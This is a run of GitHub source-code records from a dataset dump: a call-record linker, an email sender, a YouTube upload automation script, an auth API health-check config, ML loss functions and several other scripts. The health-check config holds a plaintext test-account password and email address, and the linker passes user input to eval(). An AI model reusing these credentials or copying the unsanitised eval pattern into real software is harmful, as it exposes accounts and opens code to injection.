len(insertions_to_make) > 0:\n ids_with_insertions = [insertion[1] for insertion\n in insertions_to_make]\n insertions = 0\n for insertion in insertions_to_make:\n if insertion[0] not in ids_with_insertions:\n insert_events(call_id_lists, insertion)\n insertions_to_make.remove(insertion)\n insertions += 1\n if insertions == 0:\n return None\n return call_id_lists[first_id]\n\n\ndef insert_events(call_id_lists, insertion):\n insert_id = insertion[0]\n insert_into_id = insertion[1]\n insert_list = call_id_lists[insertion]\n insert_into_list = call_id_lists[insert_into_id]\n insert_index = 0\n while insert_index < len(insert_into_list):\n if insert_list[0].time < insert_into_list[insert_index].time\\\n or insert_into_list[insert_index].associated_id == insert_id:\n break\n insert_index += 1\n insert_into_list[insert_index:insert_index] = insert_list\n\n\ndef get_call_ids_by_filter(all_data, filter_condition):\n debug_print('Processing filter \"{}\"'.format(filter_condition))\n call_ids = set()\n for event in all_data:\n if event.call_id == ' ':\n continue\n try:\n result = eval(filter_condition)\n except:\n print('Failure evaluating filter condition \"{}\"'\n .format(filter_condition), file=sys.stderr)\n break\n if result is True:\n debug_print('Found call id {} matching filter'\n .format(event.call_id))\n call_ids.add(event.call_id)\n if event.associated_id != '':\n call_ids.add(event.associated_id)\n return call_ids\n\n\ndef get_no_id_events_by_filter(all_data, filter_condition):\n event_lists = []\n for event in all_data:\n if event.call_id == ' ':\n try:\n result = eval(filter_condition)\n except:\n print('Failure evaluating filter condition \"{}\"'\n .format(filter_condition), file=sys.stderr)\n break\n if result is True:\n event_lists.append([event])\n return event_lists\n\n\ndef process_days(reader, filter_conditions, call_ids):\n unique_call_count = 0\n for file_dict in reader.date_reader():\n no_id_events = []\n debug_print('Retrieved file dictionary for date {}'.format(\n reader.current_date.strftime('%Y-%m-%d'))\n + ' from reader containing {} files'.format(\n len(file_dict)))\n all_data = read_all_data(file_dict, reader.current_date)\n\n current_call_ids = call_ids\n for condition in filter_conditions:\n current_call_ids = current_call_ids.union(get_call_ids_by_filter(\n all_data, condition))\n no_id_events.extend(get_no_id_events_by_filter(all_data,\n condition))\n\n debug_print('{} call IDs selected for {}:'.format(len(current_call_ids),\n reader.current_date.strftime('%Y-%m-%d')))\n debug_print(current_call_ids)\n\n if len(current_call_ids) > 0:\n events = group_calls_by_id(current_call_ids, all_data)\n elif len(filter_conditions) == 0:\n events = group_all_calls(all_data)\n else:\n events = {}\n unique_events = get_unique_calls(events)\n unique_events.extend(no_id_events)\n unique_call_count += len(unique_events)\n sorted_calls = sort_calls(unique_events)\n print_calls(sorted_calls)\n print('\\n{} unique calls processed'.format(unique_call_count), file=sys.stderr)\n\n\n\ncall_ids = set()\nfilter_conditions = set()\ndebug_mode = False\n\nwhile '-v' in sys.argv:\n debug_mode = True\n sys.argv.remove('-v')\n\nwhile '-f' in sys.argv:\n argindex = sys.argv.index('-f')\n parameter = sys.argv[argindex + 1]\n filter_conditions.add(parameter)\n sys.argv.remove('-f')\n sys.argv.remove(parameter)\n\nwhile '-c' in sys.argv:\n argindex = sys.argv.index('-c')\n parameter = sys.argv[argindex + 1]\n if re.match('[A-Z][0-9]{7}', parameter) is not None:\n call_ids.add(parameter)\n else:\n raise 
smdrreader.InvalidInputException('Invalid call id: ' + parameter)\n sys.argv.remove('-c')\n sys.argv.remove(parameter)\n\nstart_date = sys.argv[1]\nend_date = sys.argv[2]\ndata_dir = sys.argv[3]\n\ntry:\n smdr_reader = smdrreader.SMDRReader(data_dir, start_date, end_date)\n debug_print('SMDRReader created successfully')\nexcept smdrreader.InvalidInputException as e:\n print('Error: ' + str(e), file=sys.stderr)\n sys.exit(1)\n\nprocess_days(smdr_reader,filter_conditions,call_ids)\n","repo_name":"InfinityTotality/mitel-tools","sub_path":"segmentlinker.py","file_name":"segmentlinker.py","file_ext":"py","file_size_in_byte":12316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15170005313","text":"class Writer:\n def __init__(self, name, freq, _var, disc):\n self.name = name # base name of file\n self.freq = freq # save frequency\n self.vars = _var # list of names of the variables\n self.rows = [] # list of unknown indices\n self.x = [] # list of coordinates\n for e in disc.elements.values():\n self.rows.append(e.rows)\n self.x.append(e.evalx())\n\n def save(self, nt, t, u):\n '''Write results to disk\n '''\n if nt % self.freq == 0:\n # Open file\n f = open(self.name + '_{0:06d}'.format(nt) + '.dat', 'w+')\n # Write header\n f.write('$Info\\n')\n f.write(' Iteration Time\\n')\n f.write('{0:15d} {1:15.6f}\\n'.format(nt, t))\n # Write data\n f.write('$Solution\\n')\n f.write(' x')\n for v in self.vars:\n f.write(' {0:>15s}'.format(v))\n f.write('\\n')\n for i in range(len(self.x)):\n for j in range(len(self.x[i])):\n f.write('{0:15.6f}'.format(self.x[i][j]))\n for v in range(len(self.vars)):\n f.write(' {0:15.6f}'.format(u[self.rows[i][v][j]]))\n f.write('\\n')\n # Close file\n f.close()\n","repo_name":"acrovato/dg-flo","sub_path":"utils/writer.py","file_name":"writer.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"10049563323","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @File: asyncio_demo.py\n# @Author: dell\n# @Date: 2020/10/26 16:00\n# @Desc: \n# @Project: licode\n# @Source: PyCharm\n\n\nimport asyncio\nimport threading\n\nfrom day15.process_demo import multiprocess_demo\n\n\n@asyncio.coroutine\ndef hello():\n print('Hello world! (%s)' % threading.currentThread())\n multiprocess_demo()\n yield from asyncio.sleep(1)\n print('Hello again! 
(%s)' % threading.currentThread())\n\n\nloop = asyncio.get_event_loop()\n\ntasks = [hello(), hello()]\n\nloop.run_until_complete(asyncio.wait(tasks))\n\nloop.close()\n","repo_name":"freechenh/licode","sub_path":"day15/asyncio_demo.py","file_name":"asyncio_demo.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39895264055","text":"import smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\nHOST = (\"smtp.163.com\")\nSUBJECT = \"Test email from Python-notebook\"\nTO = [\"861022418@qq.com\", \"2859626066@qq.com\"]\nFROM = \"17610291226@163.com\"\ntext = \"哈哈哈哈哈\"\n\nmessage = MIMEText(\"For Bot: \\r\\n Python rules all.\", \"plain\", \"utf-8\")\n# message[\"From\"] = Header(FROM, \"utf-8\") # raises error 554\nmessage[\"From\"] = \"bit\" + \"<\" + FROM + \">\"\nmessage[\"To\"] = Header(\",\".join(TO), \"utf-8\")\nmessage[\"Subject\"] = Header(SUBJECT, \"utf-8\")\n\nif __name__ == \"__main__\":\n    server = smtplib.SMTP_SSL(HOST, 465)\n    server.login(FROM, \"****\")\n\n    server.sendmail(FROM, TO, message.as_string())\n    server.quit()\n","repo_name":"warmsirius/python-notebook","sub_path":"2.Python运维/2.业务服务监控/4.1 网易163邮箱发送邮件.py","file_name":"4.1 网易163邮箱发送邮件.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12988587302","text":"import pyautogui as pg ,webbrowser as web ,time as tm\r\npg.FAILSAFE = True\r\nname=input(\"Como se va llamar : \")#Asks the user for the name of the video\r\nn=name.lower()#converts the name to lowercase \r\nir = n.find('biologia')!=-1 or n.find('fisica')!=-1 or n.find('proyectos')!=-1 or n.find('ambiente')!=-1 #checks whether it belongs to irwing \r\nweb.open('https://studio.youtube.com/channel/UCxXE5uqxeC-9wBdTteT1VnA/videos?d=ud')#Opens the browser at youtube studio\r\ncurrentMouseX, currentMouseY = pg.position()#reads the mouse position \r\ntm.sleep(15)\r\n#Clicks the upload videos button \r\npg.click(708,527) #picks the video\r\n#prints the mouse coordinates\r\nprint({\r\n    \"x\":currentMouseX,\r\n    \"y\":currentMouseY\r\n})\r\ntm.sleep(4)\r\npg.click(456,191) #picks the video to upload \r\npg.press(\"enter\")\r\ntm.sleep(5)\r\npg.write(name)#types the name of the video\r\nif ir:\r\n    pg.click(1088,558)#if it belongs to irwing, copies the link\r\ntm.sleep(2)\r\npg.click(1119,650)#Clicks the next button to scroll down\r\ntm.sleep(2)\r\npg.click(256,591) #Not made for kids \r\npg.click(1119,650)#Next\r\npg.click(1119,650)#Next\r\npg.click(1119,650)#Next \r\n# if it belongs to irwing it is set to hidden, otherwise public \r\ntm.sleep(2)\r\nif ir:\r\n    pg.press(\"down\")\r\n    print(0)\r\nelse:\r\n    pg.press('up')\r\npg.click(1119,650) # clicks upload\r\n#if it belongs to irwing, opens the page to submit the video form\r\nif ir:\r\n    web.open(\"http://192.168.1.8\") #Opens the videos page \r\n    tm.sleep(5)\r\n    pg.click(627,121) #Click on the name\r\n    tm.sleep(1)\r\n    pg.write(name) #Types the name \r\n    pg.click(667,141)#Click on the link\r\n    pg.click(667,141)\r\n    tm.sleep(2)\r\n    pg.hotkey('ctrl','v')\r\n    pg.press(\"enter\")#Sends the information\r\npg.click(661,738)#opens the file explorer\r\ntm.sleep(4)\r\npg.click(71,222)#Videos \r\npg.click(456,169)#Click the first video\r\npg.hotkey ('ctrl', 'x')#Cuts the video\r\npg.click(347,161)\r\npg.click(347,161)#Goes into the Upload videos folder \r\ntm.sleep(4)\r\npg.hotkey ('ctrl', 'v')#Pastes the 
video","repo_name":"Josuecordova17/auto","sub_path":"subirvideos.py","file_name":"subirvideos.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20727114822","text":"import io\nfrom operator import mod\nimport sys\n\n_INPUT = \"\"\"\\\n1000\n\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n\n# ---------------------------------\nN = int(input())\nZ = int(1e6)\n\n\nisprime = [True for _ in range(Z + 1)]\ncnt_prime = [0 for _ in range(Z + 1)]\nprimes = []\n\nisprime[0] = False\nisprime[1] = False\n\nfor p in range(2, int(Z ** (1 / 2)) + 1):\n if isprime[p]:\n for q in range(p * p, Z + 1, p):\n isprime[q] = False\n\nfor p in range(2, Z + 1):\n if isprime[p]:\n primes.append(p)\n cnt_prime[p] = 1\n\nfor p in range(2, Z + 1):\n cnt_prime[p] += cnt_prime[p - 1]\n\n\nans = 0\nfor i in range(len(primes)):\n a = primes[i]\n if a >= N ** (1 / 5):\n break\n for j in range(i + 1, len(primes)):\n b = primes[j]\n if a * a * b * b * b >= N:\n break\n ans += cnt_prime[int((N // (a * a * b)) ** (1 / 2))] - cnt_prime[b]\n\n\nprint(ans)\n","repo_name":"makima333/Atcoder-ganbaru","sub_path":"contest/abc300/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17550814024","text":"import os\n\nfrom health import USER_ID\n\nNAME = \"Authentication\"\nBASE_URL = \"https://staging.zuri.team/api/auth\"\n\nUSER = {\n \"firstName\": \"Health Check\",\n \"lastName\": \"Super Admin\",\n \"email\": \"zurihealthcheck@gmail.com\",\n \"password\": \"zuri-health-check123\",\n}\n\nENDPOINTS_CONFIG = [\n # {\n # \"url\": \"/api/auth/signup\",\n # \"method\": \"POST\",\n # \"body_params\": USER,\n # },\n {\n \"url\": \"/api/auth/check-email\",\n \"method\": \"POST\",\n \"body_params\": {\n \"email\": USER[\"email\"]\n },\n },\n {\n \"url\": \"/api/auth/verify/{token}\",\n \"method\": \"GET\",\n \"path_params\": {\n \"token\": os.getenv(\"ACCESS_TOKEN\")\n },\n },\n {\n \"url\": \"/api/auth/verify/resend\",\n \"method\": \"POST\",\n \"body_params\": {\n \"email\": USER[\"email\"]\n },\n },\n {\n \"url\": \"/api/auth/login\",\n \"method\": \"POST\",\n \"body_params\": {\n \"email\": USER[\"email\"],\n \"password\": USER[\"password\"]\n },\n },\n {\n \"url\": \"/api/auth/reset-password\",\n \"method\": \"POST\",\n \"body_params\": {\n \"email\": USER[\"email\"]\n },\n },\n # {\n # \"url\": \"/api/auth/reset-password\",\n # \"method\": \"PATCH\",\n # \"body_params\": {\n # \"token\": \"\",\n # \"password\": USER[\"password\"]\n # },\n # \"auth_required\": True,\n # },\n {\n \"url\": \"/api/auth/2fa/enable\",\n \"method\": \"POST\",\n \"body_params\": {\n \"email\": USER[\"email\"],\n },\n \"auth_required\": True,\n },\n # {\n # \"url\": \"/api/auth/2fa/send-code\",\n # \"method\": \"POST\",\n # \"body_params\": {\n # \"email\": USER[\"email\"],\n # },\n # },\n # {\n # \"url\": '/api/auth/2fa/verify-code',\n # \"method\": \"POST\",\n # \"body_params\": {\n # \"token\": \"\",\n # \"email\": USER[\"email\"],\n # },\n # },\n {\n \"url\": \"/api/authorize/roles\",\n \"method\": \"GET\",\n \"auth_required\": True,\n },\n {\n \"url\": \"/api/authorize\",\n \"method\": \"POST\",\n \"body_params\": {\n \"token\": os.getenv(\"ACCESS_TOKEN\"),\n \"permission\": \"product.read\",\n },\n },\n {\n 'url': '/api/authorize/permissions',\n 'method': 'GET',\n },\n {\n \"url\": \"/users/permission\",\n \"method\": \"POST\",\n 
\"body_params\": {\n \"userId\": USER_ID,\n \"permissionId\": \"product.read\",\n },\n \"auth_required\": True,\n },\n {\n \"url\": \"/users/permission\",\n \"method\": \"DELETE\",\n \"body_params\": {\n \"userId\": USER_ID,\n \"permissionId\": \"product.read\",\n },\n \"auth_required\": True,\n },\n {\n \"url\": \"/users/{user_id}/role\",\n \"method\": \"PUT\",\n \"body_params\": {\n \"roleId\": 3,\n \"roleName\": \"admin\",\n },\n \"path_params\": {\n \"user_id\": USER_ID,\n },\n \"auth_required\": True,\n },\n {\n \"url\": \"/users\",\n \"method\": \"GET\",\n \"auth_required\": True,\n },\n {\n \"url\": \"/auth/change-email\",\n \"method\": \"PATCH\",\n \"body_params\": {\n \"newEmail\": \"health-check@zuri.team\",\n },\n \"auth_required\": True,\n }\n]\n","repo_name":"kevinkoech357/spitfire-super-admin-one","sub_path":"health/endpoints/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"10300962573","text":"import geopandas as gpd\nfrom . import base\n\ndesc = \"\"\"\n{\n \"name\":\"filter\",\n \"description\":\"根据输入的条件对要素进行属性过滤,只支持矢量数据,不支持栅格数据和地形数据\",\n \"inputs\":{\n \"datafile\":\"要过滤的数据文件,仅支持shape文件\",\n \"where\":\"过滤条件,类似于SQL语句中的where子句,例如:land_type=='005'\"\n },\n \"output\":\"过滤后的结果数据\"\n}\n\"\"\"\n\nexample = \"\"\"\n指令:从土地数据中提取出耕地的数据,土地类型字段是land_type,耕地类型的值为005;土地数据是land.shp。\njson: [{\n\t\"name\":\"filter\",\n\t\"inputs\":{\n\t\t\"datafile\":\"land.shp\",\n\t\t\"where\":\"land_type=='005'\"\n\t},\n \"output\":\"farm_land.shp\"\n}]\n\"\"\"\n\ndef check(tool):\n datafile = tool[\"inputs\"][\"datafile\"]\n # 必须是shp文件\n if not datafile.endswith(\".shp\"):\n return False, f\"对于工具{tool['name']},输入的datafile参数必须是shp文件,而不能是{datafile};\"\n return True, \"\"\n\n# 处理类似“City IS NOT NULL”的情况\ndef deal_no_null(where:str):\n # result_df = df.query('column_name.notna()')\n if \"IS NOT NULL\" in where:\n where = where.replace(\"IS NOT NULL\", \".notna()\")\n # 去掉中间的空格\n where = where.replace(\" \", \"\")\n return where\n\n\ndef filter(datafile:str, where:str, output:str):\n gdf = gpd.read_file(datafile)\n where = deal_no_null(where)\n filtered_gdf = gdf.query(where)\n filtered_gdf.to_file(output, encoding=base.read_shp_encoding(datafile))\n return output\n\n","repo_name":"pampa0629/gischain","sub_path":"tools/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"zh","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"7192990542","text":"import plotly.plotly as py\nimport plotly.graph_objs as go\n\ntrace = go.Scatter(\n x=[1, 2, 3], y=[1, 2, 3],\n marker=dict(\n color=['red', 'blue', 'green'],\n size=[30, 80, 200]),\n mode='markers')\nplot_url = py.plot([trace])\n\n","repo_name":"josephding23/JuliaProjects","sub_path":"PlotlyProjects/src/started.py","file_name":"started.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25718665374","text":"\"\"\"\nLoss functions for Siamese networks\n\"\"\"\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.nn.modules.loss import _Loss\n\nclass ContrastiveLoss(_Loss):\n \"\"\"\n Contrastive loss function.\n Based on: http://yann.lecun.com/exdb/publis/pdf/hadsell-chopra-lecun-06.pdf\n \"\"\"\n\n def __init__(self, margin: float = 1.25, size_average: bool = True, reduce: bool = True) -> None:\n\n super(ContrastiveLoss, self).__init__(size_average, 
\n\n def forward(self, x0: torch.Tensor, x1: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n \"\"\"\n :param x0: first input (batch_size, dimensions)\n :param x1: second input (batch_size, dimensions)\n :param y: target (batch_size,)\n y == 1 similar, y == 0 dissimilar\n :return: Y * 1/2 * distance^2 + (1 - Y) * 1/2 * max(0, margin−distance)^2\n \"\"\"\n\n # Euclidean distance\n distance = F.pairwise_distance(x0, x1)\n\n l1 = y.float() * torch.pow(distance, 2) / 2.0\n l2 = (1 - y).float() * torch.pow(torch.clamp(self.margin - distance, min=0.0), 2) / 2.0\n loss = l1 + l2\n\n if not self.reduce:\n return loss\n elif self.size_average:\n return loss.mean()\n else:\n return loss.sum()\n\n\nclass CosineContrastiveLoss(_Loss):\n \"\"\"\n Cosine contrastive loss function.\n Based on: http://anthology.aclweb.org/W16-1617\n If they match, loss+ is 1/4(1-cos_sim)^2.\n If they don't, loss- is cos_sim^2 if cos_sim < margin or 0 otherwise.\n Margin in the paper is ~0.4.\n (Here I modify loss- to max(cos_sim, 0)^2 to make it continuous,\n and the margin is modified to 0.13653 where loss+ == loss-)\n \"\"\"\n\n def __init__(self, margin: float = 0.13653, size_average: bool = True, reduce: bool = True) -> None:\n super(CosineContrastiveLoss, self).__init__(size_average, reduce)\n self.margin = margin\n\n def forward(self, x0: torch.Tensor, x1: torch.Tensor, y: torch.Tensor) -> torch.Tensor:\n \"\"\"\n :param x0: first input (batch_size, dimensions)\n :param x1: second input (batch_size, dimensions)\n :param y: target (batch_size,)\n y == 1 similar, y == 0 dissimilar\n :return: Y * 1/4(1-cos_sim)^2 + (1 - Y) * max(0, cos_sim)^2\n \"\"\"\n cos_sim = F.cosine_similarity(x0, x1)\n\n l1 = y.float() * torch.pow((1.0 - cos_sim), 2) / 4.0\n l2 = (1 - y).float() * torch.pow(cos_sim.clamp(min=0), 2)\n loss = l1 + l2\n\n if not self.reduce:\n return loss\n elif self.size_average:\n return loss.mean()\n else:\n return loss.sum()\n\n\nif __name__ == \"__main__\":\n\n test_input_1 = torch.FloatTensor([[0.6, 0.5, 1.5], [0.6, 0.5, 1.5], [1.2, 1.3, -1.2], [1.2, 1.3, -1.2]])\n test_input_2 = torch.FloatTensor([[-0.5, -0.6, 0.2], [-0.5, -0.6, 0.2], [1.21, 1.29, -1.2], [1.2, 1.3, -1.2]])\n label = torch.LongTensor([1, 0, 1, 0])\n\n loss_func = ContrastiveLoss(reduce=False)\n\n l = loss_func(test_input_1, test_input_2, label)\n\n print(\"ContrastiveLoss\", l)\n\n loss_func = CosineContrastiveLoss(reduce=False)\n\n l = loss_func(test_input_1, test_input_2, label)\n\n print(\"CosineContrastiveLoss\", l)\n","repo_name":"handsomezebra/nlp","sub_path":"my_library/models/contrastive_loss.py","file_name":"contrastive_loss.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"9667029277","text":"\"\"\"\nAnnotate inverted Alu elements (or other repeat elements) based on repeatmask (sqlite db)\n\nConvert mySQL to sqlite: https://gist.github.com/esperlu/943776. 
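The -rdb option below expects that converted sqlite database. 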
For UCSC: \n\nusage:\npython annotate_repeat.py -rdb < circRNA.bed > circRNA.IAE.bed\n\n\n\"\"\"\n\n__author__ = \"Thomas Hansen (tbh@mbg.au.dk)\"\n__lab__ = \"ncRNAlab\"\n__version__ = \"1.0.0\"\n\n\nimport sys\nimport argparse\n#import utils\nimport sqlutil\n\n\nparser = argparse.ArgumentParser(description='Annotate circRNAs')\n\nparser.add_argument('-rdb', \"--rdb\", dest='rdb', help=\"sqlite database with repeat annotation\")\nparser.add_argument('-rf', \"--repeat_family\", dest='repeat_family', nargs=\"+\", default=[\"Alu\"], help=\"Repeat families to analyse\") # [\"MIR\", \"L1\", \"L2\"]\n\nargs = parser.parse_args()\n\nsqlite_repeat_db = args.rdb\nrepeat_family = args.repeat_family \n\nsql_rep = sqlutil.sqlutil (type=\"sqlite3\", url=sqlite_repeat_db)\nrepeat_db = sql_rep.get_table ()\n\niline = 0\n\nfor line in sys.stdin:\n\n iline += 1\n \n cols = line.rstrip('\\r\\n').split ('\\t')\n\n if len (cols) < 3:\n continue\n \n # header\n if cols[0][0] == \"#\" or not cols[1].isdigit () or not cols[2].isdigit ():\n \n for family in repeat_family:\n \n f = family.lower()\n cols = cols + [f+\"dist\", f+\"dist_up_down\", f+\"name_up_down\", f+\"score_up_down\"]\n \n print (\"\\t\".join (cols))\n continue\n\n chrom, start, end, strand = cols[0], int(cols[1]), int(cols[2]), cols[5]\n \n for family in repeat_family:\n \n #downstream\n \n query = \"SELECT *, start-{} AS rel FROM {} WHERE family='{}' AND chr='{}' AND start > '{}' ORDER BY start ASC LIMIT 20\".format (\n end, repeat_db, family, chrom, end)\n \n sql_rep.query(query) \n \n inf = 99999999\n \n dist_down_p, dist_down_m, dist_up_p, dist_up_m = inf, inf, inf, inf\n name_down_p, name_down_m, name_up_p, name_up_m = \"\", \"\", \"\", \"\"\n score_down_p, score_down_m, score_up_p, score_up_m = 0,0,0,0\n \n for rr in sql_rep.fetchall():\n \n if rr[\"strand\"] == \"+\" and int(rr[\"rel\"]) < dist_down_p:\n dist_down_p = int(rr[\"rel\"])\n name_down_p = rr[\"name\"]\n score_down_p = rr[\"score\"]\n \n elif rr[\"strand\"] == \"-\" and int(rr[\"rel\"]) < dist_down_m:\n dist_down_m = int(rr[\"rel\"])\n name_down_m = rr[\"name\"]\n score_down_m = rr[\"score\"]\n \n if dist_down_p < inf and dist_down_m < inf: \n break\n\n query = \"SELECT *, {}-end AS rel FROM {} WHERE family='{}' AND chr='{}' AND end < '{}' ORDER BY end DESC LIMIT 20\".format (\n start, repeat_db, family, chrom, start)\n \n sql_rep.execute(query) \n \n for rr in sql_rep.fetchall():\n\n if rr[\"strand\"] == \"+\" and int(rr[\"rel\"]) < dist_up_p: \n dist_up_p = int(rr[\"rel\"])\n name_up_p = rr[\"name\"]\n score_up_p = int(rr[\"score\"])\n \n elif rr[\"strand\"] == \"-\" and int(rr[\"rel\"]) < dist_up_m:\n \n dist_up_m = int(rr[\"rel\"])\n name_up_m = rr[\"name\"]\n score_up_m = (rr[\"score\"])\n \n \n if dist_up_p < inf and dist_up_m < inf: \n break\n \n prox_up = min (dist_up_p, dist_up_m) \n prox_down = min (dist_down_p, dist_down_m)\n \n dist = min (dist_up_p+dist_down_m, dist_up_m+dist_down_p)\n dist_min = min (dist_up_p, dist_up_m) + min (dist_down_p, dist_down_m)\n \n if dist > inf:\n dist = \"\"\n \n (dist_up, dist_down) = (dist_up_p,dist_down_m) if (dist_up_p+dist_down_m < dist_up_m+dist_down_p) else (dist_up_m,dist_down_p)\n (name_up, name_down) = (name_up_p,name_down_m) if (dist_up_p+dist_down_m < dist_up_m+dist_down_p) else (name_up_m,name_down_p) \n (score_up, score_down) = (score_up_p,score_down_m) if (dist_up_p+dist_down_m < dist_up_m+dist_down_p) else (score_up_m,score_down_p)\n \n if strand == \"-\":\n dist_up, dist_down = dist_down, dist_up\n name_up, name_down = 
name_down, name_up\n score_up, score_down = score_down, score_up\n \n cols.append (str(dist))\n cols.append (\",\".join ([str(s) for s in [dist_up, dist_down]]))\n cols.append (\",\".join ([str(s) for s in [name_up, name_down]]))\n cols.append (\",\".join ([str(s) for s in [score_up, score_down]]))\n \n print (\"\\t\".join (cols))\n\nsql_rep.close()\n\n \n","repo_name":"ncrnalab/pyutils","sub_path":"annotate_repeat.py","file_name":"annotate_repeat.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"26370398485","text":"class Solution: \n def maximumUnits(self, boxTypes, truckSize):\n boxTypes.sort(key=lambda x: x[1], reverse=True)\n maxUnits = 0\n for boxType in boxTypes:\n numOfUnits = min(truckSize, boxType[1])\n maxUnits += numOfUnits * boxType[0]\n truckSize -= numOfUnits\n if truckSize == 0:\n break\n\n return maxUnits\n\n\n ","repo_name":"xprose7820/LC_Solutions","sub_path":"Greedy/MaximumUnitsOnTruck.py","file_name":"MaximumUnitsOnTruck.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12999113351","text":"n = int(input())\narr = list(map(int, input().split(' ')))\n# arr = [4,2,2,2,2]\narr.sort(reverse=True)\nans = []\nfor i in arr:\n if sum(ans) <= (sum(arr)-sum(ans)):\n ans.append(i)\n else:\n break\nprint(len(ans))\n","repo_name":"SuyeshBadge/Codes","sub_path":"CodeForces/A_Twins.py","file_name":"A_Twins.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39097964195","text":"import torch\nimport platform\nimport matplotlib.pyplot as plt\n\nfrom PerformanceRNN import PerformanceRNN\nfrom MidiIndexUtils import writeMidi, idxsToMidi, NUM_CHANNELS\nfrom MaestroMidiDataset import MaestroMidiDataset\n\ntop_dir = '' if platform.system() == 'Linux' else 'Documents/PerformanceMidi/'\n\nmodel_path = top_dir + 'models/performance_rnn-iter4-221.pt'\nmidi_path = top_dir + 'music/performance_rnn-iter4-221.pt.midi'\n#model_path = top_dir + 'final_models/performance_rnn-iter2-186.pt'\n#midi_path = top_dir + 'music/performance_rnn-iter2-186.pt.midi'\n#model_path = top_dir + 'models/performance_rnn-iter9-596.pt'\n#midi_path = top_dir + 'music/performance_rnn-iter9-596.pt.midi'\n\nprint('creating and loading model...')\nlstm = PerformanceRNN(input_channels=NUM_CHANNELS, output_channels=NUM_CHANNELS, hidden_size=1024, num_layers=3, dropout=0.5).to('cuda')\nlstm.load_state_dict(torch.load(model_path))\nlstm.eval()\n\nprint('predicting...')\n\n#prime = torch.zeros(1, 1, 388)\n#prime[0, 0, 355] = 1\n\ndataset = MaestroMidiDataset('train')\ndataset.fillCache()\nprime = dataset.cache[dataset.df['midi_filename'][0]][:100].long()\nonehot = torch.eye(NUM_CHANNELS)\nprime = onehot[prime][None, :, :]\n\n#print(dataset.df['midi_filename'][0])\n#y = prime\n\ny = lstm.forward_step(10000, prime=prime.to('cuda'), greedy=False)\ny = y.to('cpu').long().detach().numpy()\n\nprint('writing to midi and plotting...')\nmf, errors = idxsToMidi(y)\nprint(errors)\nwriteMidi(mf, filename=midi_path)\n\nplt.plot(y)\nplt.show()\n","repo_name":"robz/artemialis","sub_path":"performanceRNN_predict.py","file_name":"performanceRNN_predict.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"29744131931","text":"# GOOD SHIT
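\n\n# Worked example of the scoring below (added note; the job title is hypothetical):\n# \"senior software engineer\" gets a base score of 2.5 ('engineer' is in\n# _BASE_TERMS_HIGH) plus the 'senior' modifier of 1.5 from _MOD_TERMS, so 4.0.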
\n\n\ndef parse_string(string):\n \"\"\" Global function; takes string and parses it into returned list;\n helper function used by modify_score_for_search_term() \"\"\"\n str_list = []\n i = 0\n word_str = \"\"\n while i < len(string):\n if not string[i].isspace():\n word_str += string[i]\n else:\n str_list.append(word_str)\n word_str = \"\"\n i += 1\n return str_list\n\n\nclass PointGeneration:\n \"\"\" Scores individual jobs based on specific terms \"\"\"\n\n \"\"\" Used by base_scoring()\n Lists of terms that determine the base score for each job aggregated;\n job title string is compared to these terms\n * HIGH: base score of 2.5\n * MID: base score of 0\n * LOW: base score of -2.5\n\n If job title does not have a word that matches any term in these lists,\n it's given a base score of -3 (non-technical job) \"\"\"\n\n _BASE_TERMS_LOW = [\"support\", \"technician\", \"sales\"]\n _BASE_TERMS_MID = [\"qa\", \"quality assurance\", \"analyst\", \"consultant\"]\n _BASE_TERMS_HIGH = [\"engineer\", \"engineering\", \"developer\", \"manager\"]\n\n \"\"\" Used by apply_modifiers()\n Each key is compared to each word of a job title, and if a term is found,\n the floating point value will be added to the base score \"\"\"\n _MOD_TERMS = {\n \"temp\": -1.0,\n \"intern\": -0.5,\n \"junior\": 0.5,\n \"associate\": 0.5,\n \"contractor\": 0.0,\n \"mid-level\": 1.0,\n \"senior\": 1.5,\n \"principal\": 2.0,\n \"director\": 2.0\n }\n\n \"\"\" Used by check_for_removal()\n Global list that holds all jobs given a base rating \"\"\"\n _RATED_JOBS = []\n\n def __init__(self, scraped_list):\n \"\"\" Takes list from /scraping/IndeedScraper.py to use in all PointGeneration functions \"\"\"\n self.job_aggregate_data = scraped_list\n self.total_score = 0\n\n # Only used by base_scoring(), appended into _RATED_JOBS global list\n # Used to hold job title (key) and base score (value)\n self.job = {}\n\n def base_scoring(self):\n \"\"\" 